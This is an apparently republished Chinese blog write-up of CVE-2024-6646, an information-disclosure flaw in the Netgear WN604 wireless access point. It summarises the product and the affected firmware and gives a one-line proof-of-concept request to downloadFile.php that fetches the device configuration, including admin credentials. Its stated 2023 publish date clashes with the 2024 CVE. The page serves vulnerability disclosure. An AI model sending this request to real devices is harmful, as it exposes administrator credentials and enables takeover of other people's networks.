博客
关于我
Netgear WN604 downloadFile.php 信息泄露漏洞复现(CVE-2024-6646)
阅读量:798 次
发布时间:2023-02-14

本文共 492 字,大约阅读时间需要 1 分钟。

0x01 NETGEAR WN604 产品简介

NETGEAR WN604由NETGEAR公司生产,是一款支持Wi-Fi保护协议(WPA2-PSK, WPA-PSK)和有线等效加密(WEP)64位、128位和152位的无线接入器。此外,该设备还支持MAC地址认证、802.1x RADIUS以及EAP TLS、TTLS、PEAP等安全机制,为用户提供了全面的网络安全保障。

0x02 漏洞概述

在Netgear WN604的downloadFile.php接口中发现了一个信息泄露漏洞。攻击者可通过远程方式获取无线路由器的管理员账号密码,进而控制路由器后台,可能对无线网络造成破坏或发起进一步的威胁。

0x03 影响范围

该漏洞影响Netgear WN604版本号小于等于20240710的设备。

0x04 复现环境

设备运行环境包括:主机名为"Netgear",并支持相关的网络配置。

0x05 漏洞复现

PoC(Proof of Concept)代码如下:

GET /downloadFile.php?file=config HTTP/1.1  Host: User-Agent:

转载地址:http://rbcfk.baihongyu.com/

你可能感兴趣的文章
Netty工作笔记0046---TaskQueue自定义任务
查看>>
Netty工作笔记0046---异步模型原理剖析
查看>>
Netty工作笔记0047---Http服务程序实例
查看>>
Netty工作笔记0050---Netty核心模块1
查看>>
Netty工作笔记0051---Netty核心模块2
查看>>
Netty工作笔记0052---Pipeline组件剖析
查看>>
Netty工作笔记0055---Unpooled应用实例1
查看>>
Netty工作笔记0056---Unpooled应用实例2
查看>>
Netty工作笔记0057---Netty群聊系统服务端
查看>>
Netty工作笔记0058---Netty群聊系统客户端
查看>>
Netty工作笔记0059---Netty私聊实现思路
查看>>
Netty工作笔记0060---Netty心跳机制实例
查看>>
Netty工作笔记0060---Tcp长连接和短连接_Http长连接和短连接_UDP长连接和短连接
查看>>
Netty工作笔记0061---Netty心跳处理器编写
查看>>
Netty工作笔记0063---WebSocket长连接开发2
查看>>
Netty工作笔记0065---WebSocket长连接开发4
查看>>
Netty工作笔记0066---Netty核心模块内容梳理
查看>>
Netty工作笔记0068---Protobuf机制简述
查看>>
Netty工作笔记0069---Protobuf使用案例
查看>>
Netty工作笔记0070---Protobuf使用案例Codec使用
查看>>